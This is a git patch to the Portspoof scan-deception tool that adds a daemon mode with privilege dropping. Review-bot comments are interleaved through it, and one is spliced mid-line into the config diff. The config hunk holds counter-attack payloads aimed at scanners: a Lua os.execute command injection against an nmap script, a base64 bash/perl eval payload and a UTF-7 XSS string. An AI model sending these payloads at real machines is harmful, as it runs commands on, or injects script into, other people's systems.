From 9765f738db3ca9eb2b696801e0d0cd6aed940780 Mon Sep 17 00:00:00 2001 From: Piotr Date: Mon, 22 Jul 2013 14:36:59 +0200 Subject: [PATCH] ready for release --- src/Configuration.cpp | 32 +++++++++++- src/Configuration.h | 19 ++++++-- src/Fuzzer.h | 1 - src/Server.cpp | 84 ++++++++++++++++++++++++++++++++ src/Server.h | 7 +++ src/portspoof.cpp | 4 ++ src/revregex.cpp | 1 + system_files/init.d/portspoof.sh | 5 +- tools/portspoof.conf | 4 +- 9 files changed, 146 insertions(+), 11 deletions(-) diff --git a/src/Configuration.cpp b/src/Configuration.cpp index f70e7a5..d3f5e94 100755 --- a/src/Configuration.cpp +++ b/src/Configuration.cpp @@ -43,6 +43,9 @@ Configuration::Configuration() signaturefile = std::string(SIGNATURE_FILE); logfile = std::string(LOG_FILE); bind_ip=std::string(); + username=std::string(DAEMON_USER); + group=std::string(DAEMON_USER); + port=DEFAULT_PORT; opts=0; nmapfuzzsignatures_file = std::string(NMAP_FUZZ_FILE_SIG); @@ -63,6 +66,7 @@ void Configuration::usage(void) "Portspoof - service signature emulator / exploitation framework.\n\n" "-i ip : Bind to a particular IP address\n" "-p port : Bind to a particular PORT number\n" + "-D run as daemon process\n" "-s file_path : Portspoof service signature regex. file\n" "-c file_path : Portspoof configuration file\n" "-l file_path : Log port scanning alerts to a file\n" @@ -84,7 +88,7 @@ bool Configuration::processArgs(int argc, char** argv) int ch; extern char *__progname; - while ((ch = getopt(argc, argv,"l:i:p:s:c:f:n:dvh123")) != -1) { + while ((ch = getopt(argc, argv,"l:i:p:s:c:f:n:dvh123D")) != -1) { switch (ch) { case 'i': this->bind_ip = std::string(optarg); @@ -112,6 +116,9 @@ bool Configuration::processArgs(int argc, char** argv) this->opts[OPT_SYSLOG_DIS]=1; fprintf(stdout,"-> Syslog logging disabled.\n"); break; + case 'D': + this->opts[OPT_RUN_AS_D]=1; + break; case 'l': this->opts[OPT_LOG_FILE]=1; this->logfile = std::string(optarg); 
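Review bot: In the constructor hunk at -43 the new `group` default is initialised from DAEMON_USER rather than the DAEMON_GROUP macro that the Configuration.h -44 hunk of this same patch introduces, so DAEMON_GROUP is defined but never referenced and the two defaults can silently diverge if either value is edited later. Both macros currently expand to "daemon", so there is no behavioural difference today. Change the line to `group=std::string(DAEMON_GROUP);`.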
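Review bot: The new usage entry `"-D run as daemon process\n"` at -63 does not follow the `-x arg : description` column layout of the neighbouring lines, which makes the help output ragged. A flag that takes no argument can keep the alignment with `"-D : Run as a daemon process (drops privileges to the daemon user/group)\n"`; the privilege-drop wording matches what daemonize() in the Server.cpp hunk of this patch does.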
@@ -214,10 +221,31 @@ unsigned short int Configuration::getPort() int Configuration::getThreadNr() { - return this->thread_number; } + +int Configuration::getUserid() +{ + struct passwd *pwd = getpwnam(this->username.c_str()); + if(pwd) return pwd->pw_uid; + + return -1; +} + + +int Configuration::getGroupid() +{ + struct group *grp = getgrnam(this->group.c_str()); + if(grp) return grp->gr_gid; + + return -1; + +} + + + + std::vector Configuration::mapPort2Signature(unsigned short port) { diff --git a/src/Configuration.h b/src/Configuration.h index 8c2ae83..b3af614 100755 --- a/src/Configuration.h +++ b/src/Configuration.h @@ -44,6 +44,10 @@ #define LOG_FILE "portspoof.log" #define CONF_FILE "portspoof.conf" #define SIGNATURE_FILE "portspoof_signatures" + +#define DAEMON_USER "daemon" +#define DAEMON_GROUP "daemon" + #define OPT_FUZZ_WORDLIST 1 #define OPT_IP 2 #define OPT_PORT 3 @@ -56,14 +60,14 @@ #define OPT_FUZZ_INTERNAL 10 #define OPT_NOT_NMAP_SCANNER 11 #define OPT_FUZZ_RANDOM 12 +#define OPT_RUN_AS_D 13 + #define MAX_PORTS 65535 - #include #include #include -#include #include #include #include @@ -72,6 +76,11 @@ #include #include #include +#include +#include +#include +#include +#include #include "Utils.h" @@ -98,6 +107,9 @@ class Configuration { std::string signaturefile; std::string logfile; std::string bind_ip; + std::string username; + std::string group; + unsigned short int port; int thread_number; bool fuzzing_mode; @@ -127,7 +139,8 @@ class Configuration { bool getConfigValue(int value); unsigned short int getPort(); int getThreadNr(); - + int getGroupid(); + int getUserid(); }; diff --git a/src/Fuzzer.h b/src/Fuzzer.h index 652cb77..5d59d1e 100755 --- a/src/Fuzzer.h +++ b/src/Fuzzer.h @@ -42,7 +42,6 @@ #include #include #include -#include #include #include #include diff --git a/src/Server.cpp b/src/Server.cpp index 2243418..59be187 100755 --- a/src/Server.cpp +++ b/src/Server.cpp 
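Review bot: getUserid() and getGroupid() in the -214 hunk collapse a failed getpwnam()/getgrnam() lookup into a -1 return that nothing distinguishes from a real id, and the only caller in this patch (Server::daemonize in the Server.cpp hunk) passes the value straight to setgid()/setuid() without checking for it. A missing account therefore surfaces, at best, as an unrelated "Unable to drop privileges" message, and whether setuid((uid_t)-1) is rejected at all is platform-dependent. Report the failure where it happens, e.g. `if(pwd) return pwd->pw_uid;` followed by `fprintf(stderr, "getpwnam(%s): no such user\n", this->username.c_str()); return -1;`, mirror it in getGroupid(), and have the caller treat a negative result as fatal before calling setgid()/setuid(). The hunk also deletes the blank line inside getThreadNr(), which is harmless but unrelated to the change.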
@@ -174,3 +174,87 @@ int Server::choose_thread() return min; } + + + +void Server::daemonize() +{ + + const string &dir = "/"; + const std::string &stdinfile = "/dev/null"; + const std::string &stdoutfile = "/dev/null"; + const std::string &stderrfile = "/dev/null"; + + + umask(0); +/* + rlimit rl; + if (getrlimit(RLIMIT_NOFILE, &rl) < 0) + { + throw std::runtime_error(strerror(errno)); + } + + + +*/ + + pid_t pid; + if ((pid = fork()) < 0) + { + throw std::runtime_error(strerror(errno)); + } else if (pid != 0) { //parent + exit(0); + } + + setsid(); + + if (!dir.empty() && chdir(dir.c_str()) < 0) + { + throw std::runtime_error(strerror(errno)); + } + + + if (setgid(this->configuration->getGroupid()) != 0) + { + fprintf(stdout,"setgid: Unable to drop group privileges: %s", strerror(errno)); + fflush(stdout); + exit(-1); + } + + + if (setuid(this->configuration->getUserid()) != 0) + { + fprintf(stdout,"setuid: Unable to drop user privileges: %s", strerror(errno)); + fflush(stdout); + exit(-1); + } + + +/* + if (rl.rlim_max == RLIM_INFINITY) + { + rl.rlim_max = 1024; + } + + for (unsigned int i = 0; i < rl.rlim_max; i++) + { + close(i); + } + + */ + + int fd0 = open(stdinfile.c_str(), O_RDONLY); + int fd1 = open(stdoutfile.c_str(), + O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR); + int fd2 = open(stderrfile.c_str(), + O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR); + + /* + if (fd0 != STDIN_FILENO || fd1 != STDOUT_FILENO || fd2 != STDERR_FILENO) + { + throw runtime_error("new standard file descriptors were not opened as expected"); + } + */ + + +} \ No newline at end of file diff --git a/src/Server.h b/src/Server.h index 948f2d5..04f1f63 100755 --- a/src/Server.h +++ b/src/Server.h @@ -42,6 +42,12 @@ #include #include #include +#include +#include +#include +#include +#include +#include #include #include "Threads.h" @@ -66,6 +72,7 @@ class Server{ Server(Configuration* configuration); int choose_thread(); bool run(); + void daemonize(); }; #endif 
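Review bot: daemonize() drops the group and user id but never clears the supplementary group list inherited from the invoking (typically root) user, so the setgid()/setuid() pair leaves the daemon a member of every group root was in; a `setgroups(0, NULL)` call (declared in `<grp.h>`) must precede setgid(). The standard-stream redirection at the end of the function is also ineffective: the close loop that was meant to free descriptors 0–2 is commented out, so the three open() calls return fresh descriptors (fd0–fd2 are then never used or closed) and stdin/stdout/stderr stay attached to the terminal that started the process — dup2() onto STDIN_FILENO/STDOUT_FILENO/STDERR_FILENO is what replaces them. The failure paths are inconsistent as well: fork()/chdir() throw, while setgid()/setuid() print to stdout without a trailing newline and `exit(-1)`; stderr is the better target, since stdout is the stream about to be redirected. Less critical, setsid() is unchecked, `umask(0)` means any file the daemon later creates (the -l log file is opened elsewhere) receives exactly the mode its open() asks for, and the file now ends without a newline. The enclosing function is complete within the hunk; the rewritten privilege-drop and redirection section follows.
```cpp
void Server::daemonize()
{
    // … unchanged: path constants, umask(0), fork()/setsid()/chdir() …

    const int gid = this->configuration->getGroupid();
    const int uid = this->configuration->getUserid();
    if (gid < 0 || uid < 0)
    {
        fprintf(stderr, "daemonize: daemon user or group not found\n");
        exit(-1);
    }

    // Clear the supplementary groups inherited from root first; setgid() alone
    // does not touch them. Only root can call setgroups(), hence the guard.
    if ((geteuid() == 0 && setgroups(0, NULL) != 0) || setgid(gid) != 0)
    {
        fprintf(stderr, "setgid: Unable to drop group privileges: %s\n", strerror(errno));
        exit(-1);
    }

    if (setuid(uid) != 0)
    {
        fprintf(stderr, "setuid: Unable to drop user privileges: %s\n", strerror(errno));
        exit(-1);
    }

    // Redirect the inherited standard streams instead of opening extra descriptors.
    int fd0 = open(stdinfile.c_str(), O_RDONLY);
    int fd1 = open(stdoutfile.c_str(), O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
    int fd2 = open(stderrfile.c_str(), O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
    if (fd0 < 0 || fd1 < 0 || fd2 < 0 ||
        dup2(fd0, STDIN_FILENO) < 0 || dup2(fd1, STDOUT_FILENO) < 0 || dup2(fd2, STDERR_FILENO) < 0)
    {
        throw std::runtime_error(strerror(errno));
    }
    if (fd0 > STDERR_FILENO) close(fd0);
    if (fd1 > STDERR_FILENO) close(fd1);
    if (fd2 > STDERR_FILENO) close(fd2);
}
```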
diff --git a/src/portspoof.cpp b/src/portspoof.cpp index a8d6986..5fd6189 100755 --- a/src/portspoof.cpp +++ b/src/portspoof.cpp @@ -55,6 +55,10 @@ int main(int argc, char **argv) exit(1); server = new Server(configuration); + + if(configuration->getConfigValue(OPT_RUN_AS_D)) + server->daemonize(); + server->run(); return 0; diff --git a/src/revregex.cpp b/src/revregex.cpp index bc57d36..c142b08 100755 --- a/src/revregex.cpp +++ b/src/revregex.cpp @@ -33,6 +33,7 @@ * forward this exception. */ +// TODO: TO BE ENTIRELY REWRITTEN! #include "revregex.h" diff --git a/system_files/init.d/portspoof.sh b/system_files/init.d/portspoof.sh index 83369c8..a5df875 100644 --- a/system_files/init.d/portspoof.sh +++ b/system_files/init.d/portspoof.sh @@ -1,13 +1,12 @@ #!/bin/sh -# Starts and stops Portspoof +# Starts and stops Portspoof daemon # - case "$1" in start) if ! pidof portspoof >/dev/null; then - /usr/local/bin/portspoof -c /usr/local/etc/portspoof.conf -s /usr/local/etc/portspoof_signatures + /usr/local/bin/portspoof -D -c /usr/local/etc/portspoof.conf -s /usr/local/etc/portspoof_signatures echo "Starting Portspoof..." else echo "Portspoof already running.." diff --git a/tools/portspoof.conf b/tools/portspoof.conf index cb7dfd3..9b1d95d 100755 --- a/tools/portspoof.conf +++ b/tools/portspoof.conf @@ -96,10 +96,10 @@ # NMAP # nmap --script http-domino-enum-passwords.nse -p 80 172.16.37.145 -sC -PN -n --script-args domino-enum-passwords.username='xxx',domino-enum-passwords.password='secr',domino-enum-passwords.idpath='/tmp/' -d4 -80 "HTTP/1\.0 200 OK\r\nServer: Apache/(IBM_Lotus_Domino_v\.6\.5\.\d)\r\n\r\n--\r\n--\r\n--\r\n--\r\n\r\n--\r\n--
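Review bot: daemonize() can throw std::runtime_error (the fork()/chdir() failure paths in the Server.cpp hunk of this patch) and the call added here in main() is not wrapped in a try/catch, so such a failure ends in std::terminate()/abort() rather than the exit(1) the surrounding startup errors use. Wrap the call, e.g. `try { server->daemonize(); } catch (const std::exception& e) { fprintf(stderr, "daemonize: %s\n", e.what()); exit(1); }`. Note also that daemonize() forks and drops privileges after `new Server(configuration)` but before run(); whether the listening socket is bound in the constructor or in run() is not visible here, and if it is run(), a bind to a port below 1024 will fail once setuid() has run. main() continues outside the hunk.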
\r\n--\r\n--\r\nos\x2eexecute\x28\x22echo 'You have been PWNed';whoami; uname -a\x22\x29;\x0d\x0a\x0d\x0a" +80 "HTTP/1\.0 200 OK\r\nServer: Apache/(IBM_Lotus_Domino_v\.6\.5\.\d)\r\n\r\n--\r\n--\r\n--\r\n--\r\n\r\n--\r\n--\r\n--\r\n--\r\nos\x2eexecute\x28\x22echo 'You have been PWNed';whoami; uname -a\x22\x29;\x0d\x0a\x0d\x0a" #OS cmd injection payload for bash: $(cat output) and `cat output` injections -9090 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV[0];~s/SPACE/\t/ig;eval;$_=$ARGV[1];eval(decode_base64($_));" +8080 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV\x5b0\x5d;~s/SPACE/\x5ct/ig;eval;$_=$ARGV\x5b1\x5d;eval\x28decode_base64\x28$_\x29\x29;" #McAffe SuperScan UTF7 XSS payload 1010 "+ADw-img src=x onerror='a setter=alert,a=\x22UTF-7-XSS\x22;'+AD4-"